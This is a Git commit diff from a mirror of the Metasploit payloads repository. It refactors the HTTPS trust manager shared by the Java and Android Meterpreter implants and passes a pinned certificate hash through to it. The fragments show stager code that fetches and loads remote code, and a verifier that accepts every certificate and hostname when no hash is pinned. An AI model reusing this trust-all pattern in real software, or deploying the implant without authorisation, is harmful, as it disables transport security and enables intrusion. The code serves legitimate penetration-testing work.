github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-12 12:14:29 +01:00
Code Releases Activity

remove duplicated PayloadTrustManager

Browse Source
This commit is contained in:
Tim 2016-09-30 14:13:22 +08:00
parent d411bfc90b
commit 92a598101f
No known key found for this signature in database
GPG Key ID: 62361A8B17EEED19
7 changed files with 24 additions and 86 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
java/androidpayload/app/src/com/metasploit/stage/Payload.java
View File

@ -15,6 +15,7 @@ import java.net.URL;
import java.net.URLConnection;
import java.util.concurrent.TimeUnit;
import com.metasploit.meterpreter.PayloadTrustManager;
import dalvik.system.DexClassLoader;
public class Payload {
@ -111,7 +112,7 @@ public class Payload {
InputStream inStream;
if (url.startsWith("https")) {
URLConnection uc = new URL(url).openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, uc);
PayloadTrustManager.useFor(uc, CERT_HASH);
inStream = uc.getInputStream();
} else {
inStream = new URL(url).openStream();

5
java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
View File

@ -143,11 +143,6 @@ public class AndroidMeterpreter extends Meterpreter {
this.intervalCollectionManager.stop();
}
@Override
protected String getPayloadTrustManager() {
return "com.metasploit.stage.PayloadTrustManager";
}
@Override
public String[] loadExtension(byte[] data) throws Exception {
getCommandManager().resetNewCommands();

1
java/androidpayload/library/src/com/metasploit/meterpreter/android/clipboard_set_data.java
View File

@ -7,7 +7,6 @@ import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.stage.PayloadTrustManager;
public class clipboard_set_data implements Command {

11
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/HttpTransport.java
View File

@ -17,7 +17,6 @@ public class HttpTransport extends Transport {
private static final int PROXY_USER_LEN = 64;
private static final int PROXY_PASS_LEN = 64;
private static final int CERT_HASH_LEN = 20;
private static final String TRUST_MANAGER = "com.metasploit.meterpreter.PayloadTrustManager";
private URL targetUrl = null;
private URL nextUrl = null;
@ -264,10 +263,12 @@ public class HttpTransport extends Transport {
if (this.targetUrl.getProtocol().equals("https")) {
try {
Class.forName(TRUST_MANAGER).getMethod("useFor", new Class[]{URLConnection.class})
.invoke(null, new Object[]{conn});
}
catch (Exception ex) {
String certHashHex = null;
if (certHash != null) {
certHashHex = PayloadTrustManager.bytesToHex(certHash);
}
PayloadTrustManager.useFor(conn, certHashHex);
} catch (Exception ex) {
// perhaps log?
}
}

4
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
View File

@ -220,10 +220,6 @@ public class Meterpreter {
}
}
protected String getPayloadTrustManager() {
return "com.metasploit.meterpreter.PayloadTrustManager";
}
/**
* Get the command manager, used to register or lookup commands.
*/

64
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/PayloadTrustManager.java
View File

@ -1,64 +0,0 @@
package com.metasploit.meterpreter;
import java.net.URLConnection;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.security.cert.X509Certificate;
/**
* Trust manager used for HTTPS URL connection. This is in its own class because it
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
* the main {@link Meterpreter} class would have made it impossible for other/older
* JREs to load it.
* <p/>
* This class is substantically identical to the metasploit.PayloadTrustManager class,
* only that it tries to cache the ssl context and trust manager between calls.
*/
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
public X509Certificate[] getAcceptedIssuers() {
// no preferred issuers
return new X509Certificate[0];
}
public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
// trust everyone
}
public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
// trust everyone
}
public boolean verify(String hostname, SSLSession session) {
// trust everyone
return true;
}
private static PayloadTrustManager instance;
private static SSLSocketFactory factory;
/**
* Called by the {@link Payload} class to modify the given
* {@link URLConnection} so that it uses this trust manager.
*/
public static synchronized void useFor(URLConnection uc) throws Exception {
if (uc instanceof HttpsURLConnection) {
HttpsURLConnection huc = ((HttpsURLConnection) uc);
if (instance == null) {
instance = new PayloadTrustManager();
SSLContext sc = SSLContext.getInstance("SSL");
sc.init(null, new TrustManager[]{instance}, new java.security.SecureRandom());
factory = sc.getSocketFactory();
}
huc.setSSLSocketFactory(factory);
huc.setHostnameVerifier(instance);
}
}
}

22
java/androidpayload/app/src/com/metasploit/stage/PayloadTrustManager.java → java/meterpreter/shared/src/main/java/com/metasploit/meterpreter/PayloadTrustManager.java
View File

@ -31,7 +31,7 @@
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.metasploit.stage;
package com.metasploit.meterpreter;
import java.net.URLConnection;
@ -51,11 +51,17 @@ import java.security.cert.X509Certificate;
/**
* Trust manager used for HTTPS stagers. This is in its own class because it
* depends on classes only present on Sun JRE 1.4+, and incorporating it into
* the main {@link Payload} class would have made it impossible for other/older
* the main Payload class would have made it impossible for other/older
* JREs to load it.
*/
public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
private String certHash;
private PayloadTrustManager(String certHash) {
this.certHash = certHash;
}
public X509Certificate[] getAcceptedIssuers() {
// no preferred issuers
return new X509Certificate[0];
@ -86,7 +92,11 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
String authType) throws CertificateException {
String payloadHash = Payload.CERT_HASH.substring(4).trim();
if (certHash == null) {
// No HandlerSSLCert set on payload, trust everyone
return;
}
String payloadHash = certHash.substring(4).trim();
if (payloadHash.length() == 0) {
// No HandlerSSLCert set on payload, trust everyone
return;
@ -112,13 +122,13 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
}
/**
* Called by the {@link Payload} class to modify the given
* Called by the Payload class to modify the given
* {@link URLConnection} so that it uses this trust manager.
*/
public static void useFor(URLConnection uc) throws Exception {
public static void useFor(URLConnection uc, String certHash) throws Exception {
if (uc instanceof HttpsURLConnection) {
HttpsURLConnection huc = ((HttpsURLConnection) uc);
PayloadTrustManager ptm = new PayloadTrustManager();
PayloadTrustManager ptm = new PayloadTrustManager(certHash);
SSLContext sc = SSLContext.getInstance("SSL");
sc.init(null, new TrustManager[]{ptm},
new java.security.SecureRandom());